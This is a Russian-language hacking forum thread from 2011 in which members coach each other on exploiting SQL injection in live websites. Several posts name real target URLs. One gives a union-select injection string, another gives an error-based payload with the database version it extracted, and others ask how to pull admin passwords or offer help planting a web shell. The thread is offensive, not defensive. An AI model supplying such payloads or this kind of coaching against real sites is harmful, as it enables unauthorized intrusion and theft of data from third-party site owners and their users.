HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.10.2011, 19:29
z0mbie86
Новичок
Регистрация: 25.07.2009
Сообщений: 10
С нами: 8840513

Репутация: 0
По умолчанию

Цитата:
Сообщение от BigBear  
Имхо, это не скуля.
Нужен админский доступ - заюзай XSS лучше
Там доступ в админку была но теперь сама админка удалена.
 
Ответить с цитированием

  #2  
Старый 05.10.2011, 20:07
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

Цитата:
Сообщение от alexvrn  
Можно ли раскрутит такую скулю id=1' ?
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY image_order LIMIT 2' at line 1
Помогите пожалуйста
Мне тока что с таким сообщением стукнули в аську, ДА МОЖНО, но прежде чем это сделать, нужно хотя бы пару статеек по скулям почитать и понять что к чему, скуля там очень простая:

Цитата:
Сообщение от None  
_http://www.mallorca-properties.co.uk/index.php/globals/_slideshow-images_en/?entry_id=1'
там фильтруются скобки, а вы навернека первым делом встевели что то типо version()

вообщем вот ваше начало:

Цитата:
Сообщение от None  
http://www.mallorca-properties.co.uk/index.php/globals/_slideshow-images_en/?entry_id=-1+union+select+1,2+--+
а дальше хоть немножко напрегите свои извилены!
 
Ответить с цитированием

  #3  
Старый 05.10.2011, 20:11
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами: 8328566

Репутация: 935


По умолчанию

Цитата:
Сообщение от z0mbie86  
Помогите раскрутить http://217.8.80.55/?m[admin]&id=1'
Код:
https://wifi.hm-ugratel.ru/?m[admin]&id=',''and(select(1)from(select(count(*)),(concat((select(version())),0x00,floor(rand(0)*2)))x/**/from(information_schema.tables)group/**/by(x))a)and'
version(): 5.0.67
 
Ответить с цитированием

  #4  
Старый 06.10.2011, 03:16
Leon2k
Новичок
Регистрация: 25.05.2011
Сообщений: 1
С нами: 7877846

Репутация: 0
По умолчанию

Привет если есть кто умеет лить шелл отпишитесь в личку пожалуйста или аську в личку.
 
Ответить с цитированием

  #5  
Старый 06.10.2011, 03:16
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами: 7854806

Репутация: 173


По умолчанию

Доброго здравия форумчане!

В общем ищу где можно почитать про PostgreSQL

Нашёл такую скулю на сайте, а как попросить его показать мне пароль админа не знаю,

Помогите убедить сайт.

Leon2k

Можешь обратиться в личку, всё что знаю расскажу!
 
Ответить с цитированием

  #6  
Старый 06.10.2011, 07:49
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от OxoTnik  
Доброго здравия форумчане!
В общем ищу где можно почитать про
PostgreSQL
Проведение SQL-Injection в PostgreSQL
 
Ответить с цитированием

  #7  
Старый 07.10.2011, 01:30
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от OxoTnik  
такая проблема
Узнал таблицы, колонки, а в нужных колонках он не показывает нужную инфу
Как в этом случае его вытащить??
Ввёл точно все правильно!
Возможно, придётся поработать с выводом, чтото вроде

Код:
unhex(hex(%Visible_Col%)) или AES_DECRYPT(AES_ENCRYPT(%Visible_Col%,0x 71),0x71)
где %Visible_Col% - выводимая колонка в запросе

всё зависит от случая
 
Ответить с цитированием

  #8  
Старый 07.10.2011, 02:36
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию

Цитата:
Сообщение от OxoTnik  
Только где про это почитать?
В любой статье по SQL-иньекциям.

/thread43966.html

/thread104591.html
 
Ответить с цитированием

  #9  
Старый 07.10.2011, 11:53
Mr.aids
Новичок
Регистрация: 19.02.2011
Сообщений: 10
С нами: 8014646

Репутация: 0
По умолчанию

insert into помогите с injection

запрос вида

log.php?ver=1.0.1.130'

Ошибка при занесении информации в базу.

118 ******/log.php

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1.0.1.130'', '' )' at line 25

INSERT INTO log (event, os, client, ie, fr, op, ch, guid, ip, ver, msg ) VALUES ( '', '', '', '', '', '', '', '', '127.0.0.1', '1.0.1.130'', '' ) array(1) { ["ver"]=> string(10) "1.0.1.130'" }

все параметры строковые, можно как то вставить union+select?
 
Ответить с цитированием

  #10  
Старый 07.10.2011, 15:34
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами: 8772211

Репутация: 56
По умолчанию

Цитата:
Сообщение от Mr.aids  
запрос вида
log.php?ver=1.0.1.130'
Ошибка при занесении информации в базу.
118 ******/log.php
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1.0.1.130'', '' )' at line 25
INSERT INTO log (event, os, client, ie, fr, op, ch, guid, ip, ver, msg ) VALUES ( '', '', '', '', '', '', '', '', '127.0.0.1', '1.0.1.130'', '' ) array(1) { ["ver"]=> string(10) "1.0.1.130'" }
все параметры строковые, можно как то вставить union+select?
/showpost.php?p=2582303&postcount=16413

Выше на несколько постов Expl0ited'ом на живом примере приведен аналогичный способ проведения инъекции с выводом в ошибку Duplicate Entry, разве что только там режется пробел.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.